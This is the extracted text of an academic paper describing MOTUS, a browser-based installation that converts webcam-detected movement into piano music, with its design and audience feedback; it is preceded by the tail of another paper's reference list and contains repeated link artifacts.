Hladun S, Hostin D, Houck J, Howland T, Ibegwam C, Johnson J, Kalush F, Kline L, Koduru S, Love A, Mann F, May D, McCawley S, McIntosh T, McMullen I, Moy M, Moy L, Murphy B, Nelson K, Pfannkoch C, Pratts E, Puri V, Qureshi H, Reardon M, Rodriguez R, Rogers YH, Romblad D, Ruhfel B, Scott R, Sitter C, Smallwood M, Stewart E, Strong R, Suh E, Thomas R, Tint NN, Tse S, Vech C, Wang G, Wetter J, Williams S, Williams M, Windsor S, Winn-Deen E, Wolfe K, Zaveri J, Zaveri K, Abril JF, Guigo R, Campbell MJ, Sjolander KV, Karlak B, Kejariwal A, Mi H, Lazareva B, Hatton T, Narechania A, et al. 2001. The sequence of the human genome. Science 291:1304–1351 DOI 10.1126/science.1058040. Venter JC, Remington K, Heidelberg JF, Halpern AL, Rusch D, Eisen JA, Wu D, Paulsen I, Nelson KE, Nelson W, Fouts DE, Levy S, Knap AH, Lomas MW, Nealson K, White O, Peterson J, Hoffman J, Parsons R, Baden-Tillson H, Pfannkoch C, Rogers YH, Smith HO. 2004. Environmental genome shotgun sequencing of the Sargasso Sea. Science 304:66–74 DOI 10.1126/science.1093857. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 16/17 https://peerj.com http://dx.doi.org/10.1186/1471-2105-15-242 http://dx.doi.org/10.1038/35057062 http://dx.doi.org/10.4056/sigs.3899418 http://dx.doi.org/10.1126/science.1058040 http://dx.doi.org/10.1126/science.1093857 http://dx.doi.org/10.7717/peerj-cs.104 Wood DE, Salzberg SL. 2014. Kraken: ultrafast metagenomic sequence classification us- ing exact alignments. Genome Biology 15:Article R46 DOI 10.1186/gb-2014-15-3-r46. Xia LC, Cram JA, Chen T, Fuhrman JA, Fengzhu S. 2011. Accurate genome relative abundance estimation based on shotgun metgenomic reads. PLoS ONE 6:e27992 DOI 10.1371/journal.pone.0027992. Lu et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.104 17/17 https://peerj.com http://dx.doi.org/10.1186/gb-2014-15-3-r46 http://dx.doi.org/10.1371/journal.pone.0027992 http://dx.doi.org/10.7717/peerj-cs.104 work_pp4msfxqizentabvmvas5sabne ---- An interactive audio-visual installation using ubiquitous hardware and web-based software deployment Submitted 4 March 2015 Accepted 12 May 2015 Published 27 May 2015 Corresponding author Tiago Fernandes Tavares, tavares@dca.fee.unicamp.br Academic editor Sally Jo Cunningham Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.5 Copyright 2015 Tavares Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS An interactive audio-visual installation using ubiquitous hardware and web-based software deployment Tiago Fernandes Tavares School of Electrical and Computer Engineering, University of Campinas, Brazil ABSTRACT This paper describes an interactive audio-visual musical installation, namely MOTUS, that aims at being deployed using low-cost hardware and software. This was achieved by writing the software as a web application and using only hardware pieces that are built-in most modern personal computers. This scenario implies in specific technical restrictions, which leads to solutions combining both technical and artistic aspects of the installation. The resulting system is versatile and can be freely used from any computer with Internet access. Spontaneous feedback from the audience has shown that the provided experience is interesting and engaging, regardless of the use of minimal hardware. Subjects Human–Computer Interaction, Multimedia Keywords Audio-visual interaction, Computer music, Webcam INTRODUCTION Artistic interactive musical installations, like Aether (Sanchez & Castro, 2014) and Intrium (Guisan, 2005), are devices that allow an audience to interact with a sonic environment or musical concept using electronic sensors. In some cases, the installation is built as to augment the interaction between the public and an specific environment, as the well-known piano staircase (TheFunTheory, 2009), an installation in which each step in a staircase was behaved like the key of a piano, thus causing music to be played when the audio went downstairs and upstairs. More recently, modern motion sensors allowed achieving new possibilities of musical performance and interaction (Jung et al., 2012; Chen, Maeda & Takahashi, 2014) by mapping movements into musical responses. Interactive musical devices present both artistic and technological challenges (Garnett, 2001). They create the possibility of generating music according to a dance, instead of constraining dance to a pre-defined musical piece (Morales-Manzanares et al., 2001). Hence, they bring to the public a technology-enabled experience that is perceptively different from simply listening to music or dancing to a recording. Nevertheless, most installations are expensive artifacts that must be mounted by a well-trained team. This causes their cultural experience to be restricted to specific environments, such as art galleries, museums or particular events. Therefore, the cultural transformation derived from the interaction with a novel music concept has a limited audience range. How to cite this article Tavares (2015), An interactive audio-visual installation using ubiquitous hardware and web-based software deployment. PeerJ Comput. Sci. 1:e5; DOI 10.7717/peerj-cs.5 mailto:tavares@dca.fee.unicamp.br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.5 http://dx.doi.org/10.7717/peerj-cs.5 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 The installation proposed in this article, namely M, aims at being deployed for a broad public. This is achieved by combining a web-deployed software stack, little hardware requirements and simple, yet engaging, methods for interaction. As a result, the experience provided by M is made accessible for any person with an internet connection and a laptop with a webcam. The installation uses a camera as a sensor device, and a simple motion detection algorithm (Wirayuda et al., 2013) to characterize the audience’s movements. The musical generation, based on Markov chains (Schulze & Van der Merwe, 2011; Pachet, 2002; Cope, 1997), aims at converting the detected movement intensity into the intensity of the musical manifestation without requiring previous musical knowledge from the audience. The installation software also comprises auditory and visual feedback, which may use the laptop’s hardware (screen and speakers) or external devices such sound reinforcement systems and projectors. The remainder of this article is organized as follows. First, related work is presented in ‘Related Work,’ followed by a discussion about the artistic concepts behind the development of M in ‘Artistic Concept.’ In ‘The Installation,’ M is thoroughly described both from the artistic and the technical points of view. Further discussion, based on interactions with the audience, is conducted in ‘Audience Feedback and Discussion.’ Last, ‘Conclusion’ brings conclusive remarks. RELATED WORK A great number of interactive art installations has been constructed in the last decade. Each one of them implements an underlying purpose, which is often discussed in academic publications. Some are especially related to M, as it will be discussed below. Birchfield et al. (2006) brought forward the question of placement of an installation, and its impact on the usage of a public space. After implementing sonification of a bus stop in a busy street, they observed that the general public often feels self-conscious about producing sounds in this environment. Henceforth, audience engagement is an important, non-trivial issue to be considered in installations. A possible technique to achieve audience engagement is to develop a specific space for the installation, providing both auditory and visual stimuli (Kobori et al., 2006; Seo & Corness, 2007). However, as observed in the Piano Staircase (TheFunTheory, 2009), audience engagement may happen even if the installation is placed in a public space. This indicates that the placement of the installation does not cause audience engagement alone. In the evaluation of the interactive dance installation Hoppsa Universum (Kallblad et al., 2008), it has shown that is audience perception was frequently described with expressions like it was fun or be with friends. Later, Schacher (2009) noted that the audience engagement is related to the fast understanding of the interaction model, which may restrict the usage of more complicated interfaces or algorithms. Morreale, Masu & Angeli (2013) presented an algorithm, namely Robin, capable of generating piano music from the spatial position of members of the audience. The algorithm uses a rule-based system that models Western piano style music, and may Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 2/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 be used by untrained (non-musician) members of the audience. It was presented in an installation that was well-evaluated, with great acceptance ratios. M considers all of these aspects, but, unlike the work discussed above, it does not require special hardware (other than that present in most current laptops) or preparations to be used. It aims at being easily used, including by untrained audience, which reflects on the simplicity of its interaction model and its software is deployed as a web application, thus it can be readily used in private spaces. M is thoroughly described in the next section. ARTISTIC CONCEPT M was first idealized from the idea of converting movements to music using a camera. Its name comes from the Latin word that means “motion.” This section describes the artistic concepts over which it was constructed. The musical concept behind M was derived from improvised genres, like Free Jazz and some styles of ethnic Drum Circles. During an improvisation session, it is important to perceive the other members of the ensemble and create some form of communication with them. In this context, elements such as harmony and rhythm may be transformed to fit the communication process that emerges in each session. According to the model presented by Dubberly, Pangaro & Haque (2009), this type of interaction is mediated by the intention of each agent. This means that the correspondence to an intention is, for the improvisation group, more important than the achievement of technical precision. Therefore, M uses a music generation model that responds to the audience intention. For the construction of the interactive system, this intention must be assigned to control a measurable aspect of the generated music. Since M is intended to be used by an untrained audience, the musical aspect controlled by the audience’s intention must be simple to understand. For this reason, the audience’s intention was assigned to control the musical intensity. To evaluate the audience’s intention using the webcam, it was necessary to estimate the intensity of captured movements. Instead of mapping particular movements to specific sonic representations, a general movement intensity was measured using pixel-by-pixel differences. This allows the audience to explore not only the interaction with M, but also the diverse possibilities of using their bodies, interacting with friends or using objects. With the goal of inducing broader movements, the video area was divided into different regions, each related to a sonic representation. The audience can visualize the video feed, with a color scheme that highlights the regions that are most active. In addition to the aesthetic appeal, this feedback helps understanding the interaction process. For this same reason, piano sounds were used for audio rendering. They have the goal of being easy to recognize, as most of the general audience (at least in Western countries) is familiar with the instrument. The installation is described from a more technical point of view in the next section. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 3/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 1 Installation overview. THE INSTALLATION The main concern when developing M was that it could be used by as many people as possible. Steps towards this goal were taken by requiring as little external hardware as possible and by deploying the software as a web application. The hardware necessary to mount the installation was restricted to that available in a common laptop, i.e., a webcam, a video screen and internal speakers, leading to an overall system as described in Fig. 1. The deployment problem can be solved by using JavaScript as the main programming language. It can be used to deploy the application directly on a host web browser. However, this choice also poses a performance restriction, as JavaScript applications are usually slow when compared to native (compiled) programs. On the artistic side, the concept behind M is that it should convert movement to music. This conversion means that user movements should trigger a musical response, and more intense movements should correspond to a more intense musical response. Therefore, two subsystems are necessary: one comprising a movement detection algorithm and another one containing a musicological model that generates musical responses. Also, it quickly became clear that a video feedback of the detection process could improve the audience’s experience. This happens because the visual information allows the user to understand and appropriate their interaction with a novel musical device. As a result, a greater level of immersion could be provided. Therefore, M can be detailed in a block diagram as shown in Fig. 2. All blocks in gray are software, and will be executed within the computer shown in Fig. 1. The following sub-sections will present a thorough description of the movement detection, video rendering, the musicological model and the audio rendering system. Movement detection The movement detection process applied in M is very simple, as the web-based implementation does not allow for computationally demanding algorithms. The algorithm begins with the calculation the value vp of each pixel p as the sum of its red, green and blue channels, as it is a common practice in computer vision algorithms (Szeliski, 2010). Hence, it may be expressed by: vp = rp + gp + bp. (1) Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 4/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 2 Block diagram describing the installation. In this algorithm, it is more important to detect the intensity of movements than the precise movement location. Such a parameter can be estimated using the mean absolute difference between the pixel values in a frame t and those in the previous frame t − 1 (Moeslund, 2012), that is: µ[t] = P p=1 |vp[t] − vp[t − 1]| P , (2) where P is the number of pixels in the frame. Calculating the amount of movement in the whole video feed, however, does not allow placing different interaction with the installation when performing different types of movements. Therefore, the video input was first split into four different partitions. Each partition had its own movements intensity estimation, and, as will be seen later, is related to a different part of the interaction experience. In preliminary tests, it was noticed that µ[t] changes too quickly, which gives an impression of chaos and lack of control. Hence, it was necessary to apply a filter to each µt signal before using it for further purposes. An attack-release filter was applied, using the following expression: µ̂[t] =  αµ[t] + (1 − α)µ̂[t − 1] if µ[t] > µ̂[t − 1] βµ[t] + (1 − β)µ̂[t − 1] if µ[t] ≤ µ̂[t − 1]. (3) The attack-release filter acts as a low-pass filter whose cut-off frequency is different whether the input signal is higher or lower than the last output. Higher values for the α and β coefficients correspond to shorter attack and release times, respectivelly. They were manually adjusted so that the resulting interaction was smooth as desired. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 5/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Hence, the result of the movement detection process is a set of four movement estimates µ̂[t], one for each partition. This result was used both in the musicological model and the video rendering process, as it will be discussed later. Video rendering The visual feedback provided by M aims at two correlated but different goals. The first is to yield feedback on what the system is doing; that is, what is being detected. The second is to make the audience experience more immersive and engaging. Three dimensions of the system’s inner mechanisms were chosen to be conveyed: the captured image values vp as in Expression (1), the differences between the current frame and the previous frame (|vp[t] − vp[t − 1]|) and the final detected movement intensity in each partition µ̂[t] as in Expression (3). To allow the audience to clearly visualize each aspect of the interaction, these parameters were mapped to different colors. These colors were arbitrarily chosen to be blue, red and green, which colored the feedback video creating a particular aesthetic environment. As stated before, the values of each frame were mapped to the blue channel of the feedback video. The blue color, then, becomes dominant at almost all times, which gives the installation a general feeling of blue. As a consequence, blue is a color related to musical rest. Each pixel’s absolute difference to the previous frame was mapped to the red channel. This caused a red “ghost” to appear in point where strong movements were detected, indicating that an interaction was detected. This piece of visual feedback is bounded to the user and became subtle when compared to other cues. The amount of movement µ̂[t] in each frame partition was mapped to the green channel of the corresponding pixels. This aimed at helping the audience to relate movements to sounds, as a particular category of sonic responses would be clearly correlated to specific blinks in a region of the screen. This piece of visual feedback is strongly correlated to the musicological model employed, as it will be seen below. A screenshot of the video feedback in action is shown in Fig. 3, converted to gray scale to ensure visibility in printed media. As it can be seen, screen areas in which there is more movement are highlighted, and it is possible to visualize both the body movement detection and the activation of screen areas related to musical responses. Thus, the audience’s impact on the audiovisual environment is easily visualized. Musicological model The generation of musical sequences was done by means of four musicological models, each receiving as input the amount of movement of a different video partition. In all cases, the model should yield a musical manifestation that is perceived as more intense when movements in that partition are more intense. Also, this correlation should be perceived almost immediately. In addition to that, the models were built so that no strong sensation of downbeat would emerge, hence avoiding inducing the audience to perform known popular dance moves and favoring the exploration of different body movements. The sensation of Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 6/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 3 Screenshot of the video render. closure commonly found in tonal music (e.g., in I–IV–V–I sequences) was also avoided, preventing the comparison of the generated music with known pieces, also favoring experimentation. To keep the interaction more interesting, each partition was bounded to a different musicological behavior, which aimed at inducing the audience to explore the whole interactive space. An aesthetic choice that fits all of these requirements was to make all models yield sequences of musical notes, which is a musical paradigm that is easily recognized by most of the audience. When the sequences are required to be more intense, their notes were increasingly faster and louder. In order to make all musicological models yield sequences that sounded as part of the same piece, they were all bounded to the same octatonic scale, and differences were added on the way each model creates a path within that scale. As shown in Fig. 4, each generative system is independent from the others. They correspond to four different voices, namely upper, middle, harmony and bass. All of them yield note sequences, which will be later rendered. One sequence generation model applied relies on a Markov chain (Cope, 1997), adjusted so that the next note is equally likely to be equal to the previous note, a step down or a step up the scale. This model was used in the upper and the middle voices, which were also restricted to particular note ranges. The note range restriction allows users to quickly recognize each one of the voices. The other sequence generation model was the purely random choice. In the lower voice, a random note from the scale (within the range restriction) was yielded at each interaction. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 7/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 4 Block diagram for the musical interactivity. In the harmony voice, two random notes from the scale (also within the range restriction) were yielded at each time. All four voices had different functions to transform the input (movement intensity in the corresponding partition) into values of note speed and loudness, so that more intense movements are mapped to faster and louder notes. These functions were manually adjusted to provide a balanced auditory response related to each space partition, as well as an interesting experience. In all cases, it has proved to be interesting to have a lower bound filtering on the input below which it is considered as noise and does not produce any sonic response. As a result, M quickly responds to the audience’s actions. It yields a sequence of notes that are almost always dissonant and out of sync related to each other. Nevertheless, the note sequences aim to be perceived as correlated to the audience’s movements. This design fits the employed technology (JavaScript), as it is known for having a bad timing mechanism in current implementations. As note lengths are continuous and not bounded to the notes in other voices, the lack of synchronization does not harm the final result. This also allowed the audio rendering process to be performed by independent agents, as it will be discussed below. Audio rendering The audio rendering process was based on agents that receive pitch, loudness and duration information from the note sequence generated by the musical models. When a note is finished (i.e., its duration has expired), the system proceeds to render the next note (or notes, in the case of the harmony voice), and so on. To keep the interactivity process in real Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 8/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 time, the note generation and rendering processes must be synchronized, so that a request for a new note triggers its calculation. Since this system should be easy to understand, it was chosen that all voices would be rendered as a piano sound, using sampling. This way, it was expected that the majority of the audience would be able to identify the sounds that came from the system, even when bad speakers are used. The rendering system was implemented using a ready-made sequencing library (MIDI.js). After built, the system was tested both on online and live audiences. This process provided a rich feedback, as will be discussed below. AUDIENCE FEEDBACK AND DISCUSSION M was displayed both online and for live audience, which are respectively discussed in ‘Online’ and ‘Live.’ These are very different situations, as a live context demands a dedicated space for people to move without harming others, a stronger audio system that is capable of competing with other environmental sounds and a screen that allows visualization from a few meters of distance. This is not the case for online displays, which can be visualized from one’s living room or office, thus requiring a less powerful hardware. Online For the online interactions, the system was advertised on social networks, and feedback was obtained both spontaneously and from an optional evaluation form. The questions in the form were: 1. Do you play musical instruments and/or sing? (multiple choice: no, and I am not interested; no, but I would like to; yes, casually; yes, frequently; yes, professionally) 2. Do you dance? (multiple choice: no, and I am not interested; no, but I would like to; yes, casually; yes, frequently; yes, professionally) 3. What audio device did you use in the interaction? (multiple choice: no sound; embedded laptop or desktop audio; small computer speakers; headphones; big audio system or surround) 4. What screen did you use in the interaction? (multiple choice: no screen; computer or laptop screen; big screen or projector) 5. How do you evaluate your interaction with M? (multiple choice: not interesting, a little interesting, very interesting, extremely interesting) 6. Describe how was your interaction with M (optional, open question) 7. What would you change or add in M? (optional, open question) 8. Select from the items below what would you like to do with M in the future. (multiple choice, multiple answers: keep interacting; recommend to friends; download as a mobile app; contribute to next version; other) 9. Please, provide any other feedback you find relevant. In total, 19 volunteer subjects responded the questionnaire, and the majority (16) classified M as “very interesting” or “extremely interesting” for question 5. Although Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 9/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 5 Interest in MOT U S according to audio hardware. “Other” refers to one subject that reported using a mobile device for the interaction. this shows the device was well evaluated, it is also interesting to highlight the conditions that lead to this evaluation. Therefore, these results were jointly analyzed with the answers regarding the hardware used by each subject and their prior interest in dance and music. As it will be seen, no subject classified M as “not interesting.” This is an encouraging result, but can mean that uninterested subjects simply chose not to answer the questionnaire. Nevertheless, provided answers gave important insight about the audience’s usage and perception of the installation. Figure 5 shows the number of subjects with each type of audio reproduction hardware, grouped by their reported interest in M (all subjects reported using their default screen for the interaction). It may be noted that using laptop (embedded) speakers did not harm the interaction. On the other hand, no subject using headphones reported M as “extremely interesting,” which can indicate that full body movements are an important part of the experience. Data indicates that M was successfully deployed over the web and using ubiquitous hardware, as it was designed for. According to the audience, the use of minimal hardware does not harm the overall experience. However, it is important to detect which aspects impact the subjects’ reported interest level. To detect that, the reported interest levels were grouped according to the subjects’ prior interest in dancing or playing instruments and singing, as shown in Fig. 6. Gathered data shows that users with a greater interest in dancing tend to report a greater interest in M, but a similar behavior is not observed when considering their interest in playing instruments or singing. This is another evidence that performing body movements is related to a more interesting experience with the installation. All the subjects chose at least one option from Question 8. This shows that possibilities for future use were considered. As shown in Table 1, most subjects would like to keep interacting or recommend to friends, which are indicators of a positive experience with the installation. The answers with “other” regarded using M in different Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 10/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Figure 6 Interest in MOTUS according to frequency of artistic activities. Table 1 Number of times each option in Question 8 was chosen. Action Votes Keep interacting 13 Recommend to friends 13 Download as mobile app 9 Contribute to next version 5 Other 2 situations—in a classroom and using a video feed from a landscape—which also points at a positive experience. The experience description (related to Question 6) showed that most subjects first engaged an exploratory stage, in an attempt to detect the rules governing M, and then started applying their own repertoire to the interaction. According to the reports, the exploration of own sensations and body movements tended to generate more pleasant Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 11/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 experiences than attempts to generate specific musical movements. The musical generation was perceived as simple, as most subjects were able to quickly understand it. The majority of the suggestions for future work provided as an answer to Question 7 point toward changing the installation’s musicological model. Also, each suggestion was very different from the others, for example: “add more instruments,” “I tried to play the blues” and “I don’t like the way notes fade out.” This is an indication that the musicological model, and probably the screen division for interaction, should be freely composed by users, possibly sharing their results. Almost all comments regarding the interaction with the webcam related to the division of the screen. Again, each user had a different suggestion, including increasing the number of divisions and constructing neutral areas that could be used to silently move between other areas. Only one comment suggested the use of a finer motion acquisition algorithm, allowing finger positions to be detected. The spontaneous feedback was obtained by messages sent by e-mail and social networks. Most of it manifested pleasant surprises, as the presence of such a web application was found to be new. They also provided interesting comments regarding the online interaction. The most common one was a desire to record the interaction and share it on social networks. In an extreme case, a user posted a screenshot online of the visual feedback. This was not implemented in the system, but the demand clearly states a direction for future work. There was also a demand for porting the system for mobile environments. This is not possible at this moment because of the reduced processing power of mobile devices. However, it wasn’t tested how the algorithm would behave if implemented as a native application. Interestingly, some online users did not allow M to use their camera, hence harm- ing the experience. This happened because the system was mistaken for privacy-invading malware. A more informative website may be used in the future to prevent this from happening. Live When shown live, M was mounted using a big screen for video feedback (either a screen or a projector, depending on the venue) and an amplifier for audio playback. It was granted that there would be some free space for movements (as much as possible, which also depended on the venue). Care was taken so that the camera was pointed towards somewhere with no accidental movements (e.g., people passing by or strong shadings from outside) and with a more or less uniform illumination, allowing the camera to work properly. It was found that the interaction with the system made a small part of the audience too self-conscious to engage in participation. Two possibilities for that are the mirror characteristic of the visual feedback and the tendency of executing random movements in a public space. However, this was not true for everyone. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 12/15 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.5 Part of the audience quickly engaged on exploring the limits within the sonic response of the installation could be controlled. They tended to approach the camera and perform finer arm and hand movements. Some manifested the sensation of playing an imaginary spatial piano. The more extroverted part of the audience quickly engaged on exploring different body movements. An interesting interaction appeared when groups of people started interacting with the system together, which is perfectly possible due to the nature of the movement detection algorithm. These interactions generally took a longer time and were usually comprised of smiles and laughter. Finally, an interesting manifestation was given by the audience, especially those who previously played musical instruments. They clearly manifested frustration with the lack of control possibilities in the interaction, as the same movement is not always related to the exact same musical response. Also, there were comments on the simplicity of the interaction process, which made it boring after a few minutes of exploration. Although ambient lighting is usually a problem in camera-based movement detection systems, it was found that the system is robust to many different conditions. The system worked under different lighting conditions and presented adequate behavior except when lights blinked. However, the interaction experience was slightly changed depending on the colors of the background and the clothes of the audience. CONCLUSION This paper described M, a digital interactive audio-visual installation that requires only hardware that is available in most computer and has its software deployed as a web application. The aesthetic concept behind the system is that it should convert movement to music. These premises—the technical deployment and the desired artistic result—led to a series of design and aesthetic decisions, which are thoroughly described. M was shown in live performances, as well as in a website. Feedback was collected from the audience using a questionnaire and by spontaneous comments, which allowed to evaluate how the interaction with the system happened. It was found that this interaction was, most of the times, positive, but sometimes found not very engaging as it doesn’t allow many musical aspects to be explored. It can be accessed at http://www.dca.fee.unicamp.br/∼tavares/auxiliary material/ Motus/index.html, and can be freely used by anyone. Currently, it requires the Google Chrome browser. The source code is also available online, at https://github.com/tiagoft/ motus. The installation system is ready to be presented for large audiences, and there seem to be two clear directions for future work. The first is to allow recording of audio and video, as well as sharing of this content in social networks. The second is allow users to compose and share their own interaction models, with a broader range of musical material. Tavares (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.5 13/15 https://peerj.com/computer-science/ http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/Motus/index.html https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus https://github.com/tiagoft/motus http://dx.doi.org/10.7717/peerj-cs.5 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work has been funded by FAPESP, under grant 2013/17329-5. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: FAPESP: 2013/17329-5. Competing Interests The author declares there is no competing interests. Author Contributions • Tiago Fernandes Tavares conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis 